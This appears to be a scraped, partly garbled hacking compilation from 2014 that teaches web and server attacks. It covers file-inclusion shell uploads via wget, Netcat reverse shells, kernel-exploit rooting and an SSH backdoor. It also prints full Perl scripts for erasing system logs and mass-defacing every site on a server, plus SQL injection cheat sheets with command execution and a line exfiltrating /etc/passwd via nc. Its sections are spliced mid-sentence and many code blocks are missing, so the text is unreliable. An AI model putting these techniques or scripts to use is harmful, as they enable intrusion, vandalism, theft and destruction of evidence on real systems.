Web Servers & Application Hacking2014RootRoot-X Security1/1/2014

Part 1Web-hacking AttacksThis is a tutorial about web-hacking methods that I and many other hackers have collected.I thought that many people would learn a lot from this here.Guide content : Remote file inclusion Local file inclusion LFI 2 RCE LFI 2 RCE Using Firefox Local file download Full path disclosure Command Injection Vulnerability Exploit SQL Injection - with load file MSSQL Injection Blind SQL Injection Postgre SQL Injection Error based Postgre SQL Injection SQL Injection on ASPX Dot net nuke XSS CRLF CSRF Server Side Includes | Server Side Inclusion Symlink Attack Sql injection String & Union based Xpath Injection LDAP Injection DNS Zone Transfer Vulnerability Exploit Oracle Padding Attack Using Brup Suite

So lets get started !Remote file inclusion :1) RFIRFI (Remote File Inclusion) is type of web-hacking. It occurs when the PHP script uses functions include () to include some files for a GET method. This file is usually in txt format pages whose content is printed. Example:Code:http://www.site.com/index.php?page=home

Now a days RFI is rarely in use and all you need to use it on some vulnerable site is shell in txt format.

2) Vulnerable scriptCode:

3) Exploiting vulnerabilityWe have site:Code:http://www.site.com/index.php?page=home

Now instead of home we gonna use our shell.So we get:Code:http://www.site.com/index.php?page=www.shell-link.com/shell.txt?

If site is vulnerable it should show shell with list of files from site you are attacking.

4) Null byte bypassIn some scripts there is a weak protection which is gonna include file and add html extension, or some other:Code:

In that case we are going to use null byte bypass(%00).Everything after %00 would not count and use. We are also using %00 for picture upload bypass as php, but I am not going to talk about it.

So link should look like this:Code:http://www.site.com/index.php?page=www.shell-link.com/shell.txt?%00

5) Protection scriptScript should look like this:Code:

So we are going to add some stuff to protect it:Code: Tamper Dataclick Start Tamper then refresh page and in user agent put next code:Code:

Click OK. To access shell use: Code:www.link.com/shell.php

LFI 2 RCE Find LFI vulnerabel site.

Check its link.

Do -> http://www.site.com/index.php?lien=../../../../../../../../../../../../proc/self/environ

Open command prompt and run script LFI2RCE.exe [C:\lfi2rce.exe "< Website vuln link>"]

Type Command -: id Type Command -: uname -a Type Command -: ls -l

Now Upload a "shell" in this web server so, Type Command -: wget http://downlading-link-of-shell.com/c99.php or /c99.zip Type Command -: unzip c99.txt.zip Type Command -: mv c99.txt c99.php "OR" mv c99.txt Out14ws.php (where assuming "out14ws.php" is Public HTML page & move command will copy c99.txt Text to "opt14ws.php") Type Command-: ls | grep Out14ws "OR " ls | grep c99 Type Command -: pwd [ To check present working directory of shell ] Then open full link of your shell in yoyr web browse you get :http://website-name/path/path/c99.phphttp:// website-name/path/path/opt14ws.php.php

LFI 2 RCE Using Firefox Check the target if it is vulnerable to lfi or not Eg. http://www.site.com/index.php?page=../../../../../../../../etc/passwd -: orhttp://www.site.com/index.php?page=../../../../../../../../etc/passwd%00

Now. See -: http://www.site.com /index.php?page=../../../../../../proc/self/environ-: orhttp://www.site.com /index.php?page=../../../../../../proc/self/environ%00

Now in address bar or firefox type : " about:config "

Find -: accessibility.browsewithcaret > rightclick > new > string

NEW STRING VALUE : general.useragent.overridePress " Ok " new box will pop up ask for : ENTER STRING VALUE

ENTER STRING VALUE : It is general.useragent.override

After it u will see something like :

Now check the php version and Information while refreshing the vulnerable link or page.Find disabled information -: disable_functions - system, passthru, shellexec, popen, escapshellcmd, proc_open etc...

Once u have checked the php info go to : " about:config " page and see for "general.useragent.override " and ENTER STRING VALUE : Behalf of - YOUR COMMAND - Type some command like - ls -a , uname -a, cd /etc/passwd, pwd, etc... For uploading Shell You can type command : wget http://www.site.com/c99.php

Note : after putting command for getting its output you have to refresh the page or vulnable link.

Command -: ls -la

Output : On refreshing page

Command : uname -a

Local file download :

1) LFD?LFD (Local File Download) is vulnerability in script which is used to download files using GET method, but you can also use it with POST method using add-on Tamper Data.Code:http://site.com/download_file.php?file=notepad.exe

2) Vulnerable scriptCode:

3) Vulnerability check

To check if script is vulnerable we are gonna try to download etc/passwd.So instead of:Code:http://site.com/download_file.php?file=notepad.exe

We are gonna use:Code:http://site.com/download_file.php?file=../../../../../../../../../etc/passwd

If it starts to download and if it open file in text editor it look something like this:Code:root:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/sbin/nologin

Script is vulnerable!NOTE: If it is a windows server use boot.ini instead of etc/passwd.

4) Exploiting vulnerability

Now when we know that script is vulnerable, we want to see which files are on host. You can do this on this way:Code:http://site.com/download_file.php?filel=../

../ is gonna back us one directory backward and download file.

1.1 It is possible when it download file and open in text editor to print file list in directories.1.2 or it is either possible to download file but when it is opened in text editor file is empty.

In case 1.1 we dont have to guess file name and directory and we can download whatever we want.In case 1.2 we must guess file name and directory and we can download only files which name we guess. There is a few program that can help us to find files (Acunetix and HTTrack Website Copier).

5) Protection script

We have script mentioned at start:Code:

by adding if(file_exists("download/".$file) we are gonna secure script.So it should look like:Code:"> ]>bodyclientIdcorrelationIddestinationheadersmessageIdoperationtimestamptimeToLiveDSIdDSMessagingVersionnil1&x3;500"

Simply replace '' with the path to read an let the requests rip, like so:

Now the cool thing here is that it works regardless of OS, since it is due to how the Data Services are handling and parsing the XML data being passed, just make sure you request the proper file type for designated system type (check server response if you have no idea)...

Also in addition to reading files, you can simply pass a directory and it will spit back the directory content, making it very easy to map things out and find files worth reading. Now limited privileges may restrict some file reading but still plenty enough to cause trouble, enumerate lots of info, and possibly even read the site configuration details...

In addition to these named exploits in this Cold Fusion series, the same old usual suspects are still fair game here. SQL injection vulnerabilities just as common as on PHP or ASP based sites, and 'cfincludes' can enable source disclosures. In many cases the db can be compromised and Java commands maybe leveraged to further extend the potential attack vectors and escalation platform from that of a standard injection so keep your eyes out and dont be afraid to take on a new site just cause it has .CFM or .JSP files instead of the oh so popular .PHP or .ASP. Hope you enjoyed this short series on hacking Cold Fusion Servers. All material for the series was available on the net in various places, all I did was wrap it up for you and try to make it a little easier to understand. If you have any questions or suggestions please post em here or let me know via PM.

LFI exploitation via php://input [Shelling Sites]

Hey guys,Today I'll be explaining how to shell a website using "php://input" method via LFI.

So let's get started.Now let's have our target shall we. As an example, your target URL should look like this:Code:http://www.site.com/index.php?page=You can have anything similar to that as long as you can be able to read files and obtain an "include" error.

First things first, give it a shot and see if you can read "/etc/passwd"

URL will look like:Code:http://www.site.com/index.php?page=/etc/passwdIf successful, you'll be having a page that looks like this:Click this bar to view the original image of 667x422px.

Now lets try reading:Code:/proc/self/environ/proc/self/fdSo URL will become:Code:http://www.site.com/index.php?page=/proc/self/environhttp://www.site.com/index.php?page=/proc/self/fdHmm, seems like nothing is being displayed, even though I've added a null-byte at the end of the URL.Click this bar to view the original image of 651x389px.

Well, not to worry, it's time to use our back up method. The "php://input" method will help us read files with certain commands, hence enables us to upload a shell.This can be done using the "Hackbar" or by using "Live HTTP headers"

I'll show you how to exploit via php://input using the "Hackbar"

So lets check what we're supposed to use in the HackbarClick this bar to view the original image of 686x190px.

Now let's try putting this method in action.Look at the picture carefully.Click this bar to view the original image of 800x325px.

URL will be:Code:http://www.site.com/index.php?page=php://inputand POST DATA:Code:

Other commandsList directoriesCode: IdentificationCode:

Convert formatCode:

Alright, let's spawn a shell there now shall we.

Grab a shell from sh3ll.org or anywhere else.For now, we'll be using the normal c99 shellCode:http://www.sh3ll.org/c99.txt?

Let's use the "wget" command to spawn our shell on the site.

So our POST DATA will be:Code:

This is how it's gonna look like.Click this bar to view the original image of 680x173px.

Now that you've spawn a shell, you can now navigate to your shell on the site.Code:http://www.site.com/shell.phpYou can watch a video tutorial below so that it'll be easier to understand.Have fun.

Server Rooting Via Shell and Mass defacement scriptNow let's kill the root:

Getting Backconnection to the server Copy the Netcat directory to C:\Open command prompt, type: cd C:\NETCATIt'll look like this:

Microsoft Windows [Version 6.1.7600]Copyright (c) 2009 Microsoft Corporation. All rights reserved.C:\Users\kislay>cd c:\netcatc:\netcat>

Now Type: nc -l -v -p 2121It'll look like-

c:\netcat>nc -l -v -p 2121listening on [any] 2121 ...

Open your Shell in your browser, go to the backconnection tab, if it is not there get ashell like "B374k" or Any otherthats your choice.

Specify your ip & port as 2121. press connect, now you'll get a shell to the server, youcan give commands to the server through that shell.

Getting a Right exploit for the server

Type : Uname -a & hit enter.

It'll look something like this:

[admin@www.saijyotishvani.com /home/saijyoti/public_html/cgi-bin]$ uname -aLinux dualxeon09.ns5.999servers.com 2.6.18-194.26.1.el5 #1 SMP Tue Nov 9 12:54:20 EST 2010x86_64 x86_64 x86_64 GNU/Linux

It shows the kernal version of the server is: 2.6.18-194.26.1.el5& Year is 2010.You need to find a perfect exploit for it. you can find them at-

# Exploit-db.com# Packetstormsecurity.org# Th3-0utl4ws.com# Leetupload.com# r00tw0rm.com

Compiling & executing exploit Now I've got an exploit, & it is written in C. So I can't execute it by just uploading.but I need to compile it. Before proceeding further, Cd into the tmp directory, coz it is always writable. So type:Cd /home/XXXXX/public_html/tmp

// The path can be different, replace it with yours. So first I'll get the exploit on the server, So I type : Wgethttp://exploitsite.net/exploits/my_exploit.c

// Note: There is no such site, I'm just taking it to show you.It'll look something Like this-

[admin@www.targetsite.com /home/saijyoti/public_html/tmp]$ wgethttp://exploitsite.net/exploits/my_exploit.c--2011-01-25 08:21:43-- http://exploitsite.net/exploits/my_exploit.cResolving www.exploitsite.net... 120.139.90.84Connecting to www.exploitsite.net|120.139.90.84|:80... connected.HTTP request sent, awaiting response... 200 OKLength: 15088 (15K) [text/x-csrc]Saving to: `my_exploit.c'0K .......... .... 100% 189K=0.08s2011-01-25 08:21:44 (189 KB/s) - `my_exploit.c' saved [15088/15088]

now change the permission of the exploit to 777.

Type: Chmod 777 my_exploit.cIt may look like:

[admin@www. targetsite.com /home/targetsite/public_html/tmp]$ chmod 777 ImpelDown.c

Now the exploit is On my server, I just need to compile & execute it.So, I'll give the command: gcc -o exploit exploit.cIt'll compile & save the exploit as exploitIt may look like-

[admin@www.targetsite.com /home/targetsite/public_html/tmp]$ gcc -o exploit exploit.c

Next step is to execute it So we'll type: ./exploitIt may look like:

[admin@www.targetsite.com /home/targetsite/public_html/tmp]$ gcc -o ImpelDown.cNow it say got root. Let's Check is it true,Type: idIt may look like : uid=0(saijyoti) gid=0(saijyoti) groups=0(root)Which Means I got root :)

Installing Backdoor type : Wget urlofbackdoor.com/sshdoor.zipThen Type : Unzip Sshdoor.zipThen type : ./run pass port^ replace pass with your password, & a port.Now connect with putty & enjoy root privileges. ;)

Methods to execute exploits written in other languages#C exploitgcc-o exploit exploit.cchmod +x exploit./exploit#Perlperlexploit.pl#pythonpythonexploit.py#phpphpexploit.php#zipunzip exploit.zip./run

Cleaning Logs# you can use my log cleaner to clear your track :D. It is written in perl. save it asanything.pl& to execute type: perl anything.plhere is the code-[perl]

#!usr/bin/perl -w #Warnings enabled!#Log cleaner version Public#Give Credits Where Needed - Kouros!#This took time, Hope you fucking use it :D#Report bugs to info@Kouros-bl4ckhat.com#NOTE - YOU MUST BE ROOT!print qq^##################################### Log Cleaner 3.0 PUBLIC ## Kouros ## ## Virangar Security Team ## http://www.Kouros-bl4ckhat.com #####################################^;while(1) {print "Enter Which OS: "; #User Inputchomp($os = ); #Takes it into memoryif($os eq "help"){print "[+]Enter Your OS! Choose from 'linux', 'aix', 'sunos', 'irix'\n";print "[+]Hit enter with OS, Let the script do its work\n";print "[+]Note: You MUST Be Root!\n";print "[+]Contact Info[at]Kouros-bl4ckhat [dot] Com";print "[+]For Bug finds... Have Fun!\n";print "[+] - Kouros";}if($os eq "linux"){ #If linux typed, do the following and start bracketsforeach my $logphile(@linux) {unlink($logphile) || print "[-]Fucked up: \"$logphile\" : $!\n";}} elsif($os eq "sunos"){ #If sunos typed, do the following and start bracketsforeach my $logphile(@sunos) {unlink($logphile) || print "[-] Fucked up: \"$logphile\" : $!\n";}} elsif($os eq "aix"){ #If aix typed, do the following and start bracketsforeach my $logphile(@aix) {unlink($logphile) || print "[-] Fucked up: \"$logphile\" : $!\n";}} elsif($os eq "irix"){ #If irix typed, do the following and start bracketforeach my $logphile(@irix) {unlink($logphile) || print "[-] Fucked up: \"$logphile\" : $!\n";}} else { print"Umm WTF !?\n"; }#Logs of Irix Systems{ #Start Irix Bracket@irix = ("/var/adm/SYSLOG", "/var/adm/sulog", "/var/adm/utmp", "/var/adm/utmpx","/var/adm/wtmp", "/var/adm/wtmpx", "/var/adm/lastlog/","/usr/spool/lp/log", "/var/adm/lp/lp-errs", "/usr/lib/cron/log","/var/adm/loginlog", "/var/adm/pacct", "/var/adm/dtmp","/var/adm/acct/sum/loginlog", "var/adm/X0msgs", "/var/adm/crash/vmcore","/var/adm/crash/unix") #End Array} #End Irix Bracket#Log sof Aix Systems{ #Start Aix Bracket@aix = ("/var/adm/pacct", "/var/adm/wtmp", "/var/adm/dtmp", "/var/adm/qacct","/var/adm/sulog", "/var/adm/ras/errlog", "/var/adm/ras/bootlog","/var/adm/cron/log", "/etc/utmp", "/etc/security/lastlog","/etc/security/failedlogin", "usr/spool/mqueue/syslog") #End Array} #End Aix Bracket#Logs of SunOS Systems{ #Start SunOS Bracket@sunos = ("/var/adm/messages", "/var/adm/aculogs", "/var/adm/aculog","/var/adm/sulog", "/var/adm/vold.log", "/var/adm/wtmp","/var/adm/wtmpx", "/var/adm/utmp", "/var/adm/utmpx","/var/adm/log/asppp.log", "/var/log/syslog","/var/log/POPlog", "/var/log/authlog", "/var/adm/pacct","/var/lp/logs/lpsched", "/var/lp/logs/requests","/var/cron/logs", "/var/saf/_log", "/var/saf/port/log") #End Array} #End Sunos bracket#Logs of Linux Systems{ #Start Linux Bracket@linux = ("/var/log/lastlog", "/var/log/telnetd", "/var/run/utmp","/var/log/secure","/root/.ksh_history", "/root/.bash_history","/root/.bash_logut", "/var/log/wtmp", "/etc/wtmp","/var/run/utmp", "/etc/utmp", "/var/log", "/var/adm","/var/apache/log", "/var/apache/logs", "/usr/local/apache/logs","/usr/local/apache/logs", "/var/log/acct", "/var/log/xferlog","/var/log/messages/", "/var/log/proftpd/xferlog.legacy","/var/log/proftpd.xferlog", "/var/log/proftpd.access_log","/var/log/httpd/error_log", "/var/log/httpsd/ssl_log","/var/log/httpsd/ssl.access_log", "/etc/mail/access","/var/log/qmail", "/var/log/smtpd", "/var/log/samba","/var/log/samba.log.%m", "/var/lock/samba", "/root/.Xauthority","/var/log/poplog", "/var/log/news.all", "/var/log/spooler","/var/log/news", "/var/log/news/news", "/var/log/news/news.all","/var/log/news/news.crit", "/var/log/news/news.err","/var/log/news/news.notice","/var/log/news/suck.err", "/var/log/news/suck.notice","/var/spool/tmp", "/var/spool/errors", "/var/spool/logs", "/var/spool/locks","/usr/local/www/logs/thttpd_log", "/var/log/thttpd_log","/var/log/ncftpd/misclog.txt", "/var/log/nctfpd.errs","/var/log/auth") #End array} #End linux bracket} #Ends Loop[/perl] Mass deface I've a perl to mass deface sites on the server. execute it as the same way as above.[perl]# MSRml V 0.1 ## ## MOROCCO.SECURITY.RULZ mass defacer and log eraser ## ## coded by PRI[ll ## ## !!!!PRIV8!!!!!PRIV8!!!!!PRIV8!!!!!PRIV8!!!! ## ## 05/07/2005 ## ## usage : perl MSRml.pl ## ## example : perl MSRml.pl /tmp/index.html ## ## the_r00t3r@hotmail.com ##!/usr/bin/perluse strict;my $index = $ARGV[0];if ($ARGV[0]){if( -e $index ){system "echo -e "33[01;34mStarted MSRml V0.1 by PRI[ll Ok !!33[01;37m"n";system "echo -e "\033[01;37mDefacing all homepages ..."n";system "find / -name "index*" -exec cp $index {} \;";system "find / -name "main*" -exec cp $index {} \;";system "find / -name "home*" -exec cp $index {} \;";system "find / -name "default*" -exec cp $index {} \;";system "echo -e "\033[01;37m[+] done ! all sites in this box are defaced !"n";system "echo -e "\033[01;37m----------------------------------------------------------"n";system "echo -e "\033[01;37mCleaning up logs ..."n";system "echo -e "33[01;34m---------erasing default log files (too fast=))---------33[01;37m"n";if( -e "/var/log/lastlog" ){system 'rm -rf /var/log/lastlog';system "echo -e "\033[01;37m [*]/var/log/lastlog -erased Ok"n";}else{system "echo -e "\033[01;31m[*]/var/log/lastlog - No such file or directory\033[01;37m"n";}if( -e "/var/log/wtmp" ){system 'rm -rf /var/log/wtmp';system "echo -e "\033[01;37m [*]/var/log/wtmp -erased Ok"n";}else{system "echo -e "\033[01;31m[*]/var/log/wtmp - No such file or directory\033[01;37m"n";}if( -e "/etc/wtmp" ){system 'rm -rf /etc/wtmp';system "echo -e "\033[01;37m [*]/etc/wtmp -erased Ok"n";}else{system "echo -e "\033[01;31m[*]/etc/wtmp - No such file or directory\033[01;37m"n";}if( -e "/var/run/utmp" ){system 'rm -rf /var/run/utmp';system "echo -e "\033[01;37m [*]/var/run/utmp -erased Ok"n";}else{system "echo -e "\033[01;31m[*]/var/run/utmp - No such file or directory\033[01;37m"n";}if( -e "/etc/utmp" ){system 'rm -rf /etc/utmp';system "echo -e "\033[01;37m [*]/etc/utmp -erased Ok"n";}else{system "echo -e "\033[01;31m[*]/etc/utmp - No such file or directory\033[01;37m"n";}if( -e "/var/log" ){system 'rm -rf /var/log';system "echo -e "\033[01;37m [*]/var/log -erased Ok"n";}else{system "echo -e "\033[01;31m[*]/var/log - No such file or directory\033[01;37m"n";}if( -e "/var/logs" ){system 'rm -rf /var/logs';system "echo -e "\033[01;37m [*]/var/logs -erased Ok"n";}else{system "echo -e "\033[01;31m[*]/var/logs - No such file or directory\033[01;37m"n";}if( -e "/var/adm" ){system 'rm -rf /var/adm';system "echo -e "\033[01;37m [*]/var/adm -erased Ok"n";}else{system "echo -e "\033[01;31m[*]/var/adm - No such file or directory\033[01;37m"n";}if( -e "/var/apache/log" ){system 'rm -rf /var/apache/log';system "echo -e "\033[01;37m [*]/var/apache/log -erased Ok"n";}else{system "echo -e "\033[01;31m[*]/var/apache/log - No such file or directory\033[01;37m"n";}if( -e "/var/apache/logs" ){system 'rm -rf /var/apache/logs';system "echo -e "\033[01;37m [*]/var/apache/logs -erased Ok"n";}else{system "echo -e "\033[01;31m[*]/var/apache/logs - No such file or directory\033[01;37m"n";}-10-C:\Users\kislay\Desktop\rooted.txt 25 January 2011 20:54if( -e "/usr/local/apache/log" ){system 'rm -rf /usr/local/apache/log';system "echo -e "\033[01;37m [*]/usr/local/apache/log -erased Ok"n";}else{system "echo -e "\033[01;31m[*]/usr/local/apache/log - No such file ordirectory\033[01;37m"n";}if( -e "/usr/local/apache/logs" ){system 'rm -rf /usr/local/apache/logs';system "echo -e "\033[01;37m [*]/usr/local/apache/logs -erased Ok"n";}else{system "echo -e "\033[01;31m[*]/usr/local/apache/logs - No such file ordirectory\033[01;37m"n";}if( -e "/root/.bash_history" ){system 'rm -rf /root/.bash_history';system "echo -e "\033[01;37m [*]/root/.bash_history -erased Ok"n";}else{system "echo -e "\033[01;31m[*]/root/.bash_history - No such file or directory\033[01;37m"n";}if( -e "/root/.ksh_history" ){system 'rm -rf /root/.ksh_history';system "echo -e "\033[01;37m [*]/root/.ksh_history -erased Ok"n";}else{system "echo -e "\033[01;31m[*]/root/.ksh_history - No such file or directory\033[01;37m"n";}system "echo -e "\033[01;37m[+] -----done all default log and bash_history files erased !!"n";system "echo -e "33[01;34m---------Now Erasing the rest of the machine log files (can belong :S)---------33[01;37m"n";system 'find / -name *.bash_history -exec rm -rf {} ;';system "echo -e "\033[01;37m[*] all *.bash_history files -erased Ok!"n";system 'find / -name *.bash_logout -exec rm -rf {} ;';system "echo -e "\033[01;37m[*] all *.bash_logout files -erased Ok!"n";system 'find / -name "log*" -exec rm -rf {} ;';system "echo -e "\033[01;37m[*] all log* files -erased Ok!"n";system 'find / -name *.log -exec rm -rf {} ;';system "echo -e "\033[01;37m[*] all *.log files -erased Ok!"n";system "echo -e "33[01;34m-------[+] !done all log files erased![+]-------33[01;37m"n";system "echo -e "33[01;34m---------------------------------------------------33[01;37m"n";system "echo -e "33[01;34m-----------------MSRml V 0.1----------------------33[01;37m"n";}else{system "echo -e "\033[01;31m[-] Failed ! the path to u're index could not be found!\033[01;37m"n";exit;}}else{system "echo -e "\033[01;37m!!Morocco.Security.Rulz mass defacer and log eraser !!"n";system "echo -e "\033[01;37m!!!!!!!!!!!!!!!!!!coded by PRI[ll!!!!!!!!!!!!!!!!!!!!!!!!"n";system "echo -e"\033[01;31m!!!!!!!!PRIV8!!!!!!!!PRIV8!!!!!!!!PRIV8!!!!!!!!PRIV8!!!!!!!!\033[01;37m"n";system "echo -e "\033[01;37musage : perl $0 CharSELECT char(041) returns A

Char -> ASCII ValueSELECT ascii(A) returns 65

CastingSELECT CAST(1 as int);SELECT CAST(1 as char)

String ConcatenationSELECT A + B returns AB

If StatementIF (1=1) SELECT 1 ELSE SELECT 2 returns 1

Case StatementSELECT CASE WHEN 1=1 THEN 1 ELSE 2 END returns 1

Avoiding QuotesSELECT char(65)+char(66) returns AB

Time DelayWAITFOR DELAY 0:0:5 pause for 5 seconds

Make DNS Requestsdeclare @host varchar(800); select @host = name FROM master..syslogins; exec(master..xp_getfiledetails \ + @host + c$boot.ini); nonpriv, works on 2000declare @host varchar(800); select @host = name + - + master.sys.fn_varbintohexstr(password_hash) + .2.pentestmonkey.net from sys.sql_logins; exec(xp_fileexist \ + @host + c$boot.ini); priv, works on 2005 NB: Concatenation is not allowed in calls to these SPs, hence why we have to use @host. Messy but necessary. Also check out theDNS tunnel feature of sqlninja

Command ExecutionEXEC xp_cmdshell net user; privOn MSSQL 2005 you may need to reactivate xp_cmdshell first as its disabled by default:EXEC sp_configure show advanced options, 1; privRECONFIGURE; privEXEC sp_configure xp_cmdshell, 1; privRECONFIGURE; priv

Local File AccessCREATE TABLE mydata (line varchar(8000));BULK INSERT mydata FROM c:boot.ini;DROP TABLE mydata;

Hostname, IP AddressSELECT HOST_NAME()

Create UsersEXEC sp_addlogin user, pass; priv

Drop UsersEXEC sp_droplogin user; priv

Make User DBAEXEC master.dbo.sp_addsrvrolemember user, sysadmin; priv

Location of DB filesEXEC sp_helpdb master; location of master.mdfEXEC sp_helpdb pubs; location of pubs.mdf

Default/System Databasesnorthwindmodelmsdbpubs not on sql server 2005tempdb

Misc TipsIn no particular order, here are some suggestions from pentestmonkey readers.From Dan Crowley:A way to extract data via SQLi with a MySQL backendFrom Jeremy Bae:Tip about sp_helpdb included in table above.From Trip:List DBAs (included in table above now):select name from master..syslogins where sysadmin = 1From Daniele Costa:Tips on using fn_my_permissions in 2005, 2008 included in table above.Also:To check permissions on multiple database you will have to use the following pattern.USE [DBNAME]; select permission_name FROM fn_my_permissions (NULL, DATABASE)Note also that in case of using this data with a UNION query a collation error could occur.In this case a simple trick is to use the following syntax:select permission_name collate database_default FROM fn_my_permissions (NULL, DATABASE)

MySQL SQL Injection Cheat SheetSome useful syntax reminders for SQL Injection into MySQL databasesThis post is part of a series of SQL Injection Cheat Sheets. In this series, Ive endevoured to tabulate the data to make it easier to read and to use the same table for for each database backend. This helps to highlight any features which are lacking for each database, and enumeration techniques that dont apply and also areas that I havent got round to researching yet.The complete list of SQL Injection Cheat Sheets Im working is: Oracle MSSQL MySQL PostgreSQL Ingres DB2 InformixIm not planning to write one for MS Access, but theres a great MS Access Cheat Sheet here.Some of the queries in the table below can only be run by an admin. These are marked with priv at the end of the query.VersionSELECT @@version

CommentsSELECT 1; #commentSELECT /*comment*/1;

Current UserSELECT user();SELECT system_user();

List UsersSELECT user FROM mysql.user; priv

List Password HashesSELECT host, user, password FROM mysql.user; priv

Password CrackerJohn the Ripper will crack MySQL password hashes.

List PrivilegesSELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; list user privsSELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user; priv, list user privsSELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges; list privs on databases (schemas)SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges; list privs on columns

List DBA AccountsSELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = SUPER;SELECT host, user FROM mysql.user WHERE Super_priv = Y; # priv

Current DatabaseSELECT database()

List DatabasesSELECT schema_name FROM information_schema.schemata; for MySQL >= v5.0SELECT distinct(db) FROM mysql.db priv

List ColumnsSELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != mysql AND table_schema != information_schema

List TablesSELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != mysql AND table_schema != information_schema

Find Tables From Column NameSELECT table_schema, table_name FROM information_schema.columns WHERE column_name = username; find table which have a column called username

Select Nth RowSELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0; # rows numbered from 0SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 1; # rows numbered from 0

Select Nth CharSELECT substr(abcd, 3, 1); # returns c

Bitwise ANDSELECT 6 & 2; # returns 2SELECT 6 & 1; # returns 0

ASCII Value -> CharSELECT char(65); # returns A

Char -> ASCII ValueSELECT ascii(A); # returns 65

CastingSELECT cast(1 AS unsigned integer);SELECT cast(123 AS char);

String ConcatenationSELECT CONCAT(A,'B); #returns ABSELECT CONCAT(A,'B,'C); # returns ABC

If StatementSELECT if(1=1,foo,'bar); returns foo

Case StatementSELECT CASE WHEN (1=1) THEN A ELSE B END; # returns A

Avoiding QuotesSELECT 0414243; # returns ABC

Time DelaySELECT BENCHMARK(1000000,MD5(A));SELECT SLEEP(5); # >= 5.0.12

Make DNS RequestsImpossible?

Command ExecutionIf mysqld (0) AND (NOT A.attisdropped) AND (N.nspname ILIKE public)

List TablesSELECT c.relname FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN (r,) AND n.nspname NOT IN (pg_catalog, pg_toast) AND pg_catalog.pg_table_is_visible(c.oid)

Find Tables From Column NameIf you want to list all the table names that contain a column LIKE %password%:SELECT DISTINCT relname FROM pg_class C, pg_namespace N, pg_attribute A, pg_type T WHERE (C.relkind=r') AND (N.oid=C.relnamespace) AND (A.attrelid=C.oid) AND (A.atttypid=T.oid) AND (A.attnum>0) AND (NOT A.attisdropped) AND (N.nspname ILIKE public) AND attname LIKE %password%;

Select Nth RowSELECT usename FROM pg_user ORDER BY usename LIMIT 1 OFFSET 0; rows numbered from 0SELECT usename FROM pg_user ORDER BY usename LIMIT 1 OFFSET 1;

Select Nth CharSELECT substr(abcd, 3, 1); returns c

Bitwise ANDSELECT 6 & 2; returns 2SELECT 6 & 1; returns 0

ASCII Value -> CharSELECT chr(65);

Char -> ASCII ValueSELECT ascii(A);

CastingSELECT CAST(1 as varchar);SELECT CAST(1 as int);

String ConcatenationSELECT A || B; returnsAB

If StatementIF statements only seem valid inside functions, so arent much use for SQL injection. See CASE statement instead.

Case StatementSELECT CASE WHEN (1=1) THEN A ELSE B END; returns A

Avoiding QuotesSELECT CHR(65)||CHR(66); returns AB

Time DelaySELECT pg_sleep(10); postgres 8.2+ onlyCREATE OR REPLACE FUNCTION sleep(int) RETURNS int AS /lib/libc.so.6, sleep language C STRICT; SELECT sleep(10); priv, create your own sleep function. Taken from here .

Make DNS RequestsGenerally not possible in postgres. However if contrib/dblinkis installed (it isnt by default) it can be used to resolve hostnames (assuming you have DBA rights):SELECT * FROM dblink('host=put.your.hostname.here user=someuser dbname=somedb', 'SELECT version()') RETURNS (result TEXT);Alternatively, if you have DBA rights you could run an OS-level command (see below) to resolve hostnames, e.g. ping pentestmonkey.net.

Command ExecutionCREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS /lib/libc.so.6, system LANGUAGE C STRICT; privSELECT system(cat /etc/passwd | nc 10.0.0.1 8080); priv, commands run as postgres/pgsql OS-level user

Local File AccessCREATE TABLE mydata(t text);COPY mydata FROM /etc/passwd; priv, can read files which are readable by postgres OS-level user UNION ALL SELECT t FROM mydata LIMIT 1 OFFSET 1; get data back one row at a time UNION ALL SELECT t FROM mydata LIMIT 1 OFFSET 2; get data back one row at a time DROP TABLE mytest mytest;Write to a file:CREATE TABLE mytable (mycol text);INSERT INTO mytable(mycol) VALUES ();COPY mytable (mycol) TO /tmp/test.php; priv, write files as postgres OS-level user. Generally you wont be able to write to the web root, but its always work a try. priv user can also read/write files by mapping libc functions

Hostname, IP AddressSELECT inet_server_addr(); returns db server IP address (or null if using local connection)SELECT inet_server_port(); returns db server IP address (or null if using local connection)

Create UsersCREATE USER test1 PASSWORD pass1; privCREATE USER test1 PASSWORD pass1 CREATEUSER; priv, grant some privs at the same time

Drop UsersDROP USER test1; priv

Make User DBAALTER USER test1 CREATEUSER CREATEDB; priv

Location of DB filesSELECT current_setting(data_directory); privSELECT current_setting(hba_file); priv

Default/System Databasestemplate0template1

Ingres SQL Injection Cheat SheetIngres seems to be one of the less common database backends for web applications, so I thought it would be worth installing it and making some notes to make my next Ingres-based web app test a little easier.Below are some tabulated notes on how to do many of thing youd normally do via SQL injection. All tests were performed on Ingres 9.2.0 alpha Build 108 for Linux. The Ingres download page is here.This page will probably remain a work-in-progress for some time yet. Ill update it as I learn more.This post is part of series of SQL Injection Cheat Sheets. In this series, Ive endevoured to tabulate the data to make it easier to read and to use the same table for for each database backend. This helps to highlight any features which are lacking for each database, and enumeration techniques that dont apply and also areas that I havent got round to researching yet.The complete list of SQL Injection Cheat Sheets Im working is: Oracle MSSQL MySQL PostgreSQL Ingres DB2 InformixIm not planning to write one for MS Access, but theres a great MS Access Cheat Sheet here.Versionselect dbmsinfo(_version);

CommentsSELECT 123; commentselect 123; /* comment */

Current Userselect dbmsinfo(session_user);select dbmsinfo(system_user);

List UsersFirst connect to iidbdb, then:SELECT name, password FROMiiuser; orSELECT own FROM iidatabase;

Create Userscreate user testuser with password = testuser; priv

List Password HashesFirst connect to iidbdb, then:select name, password from iiuser;

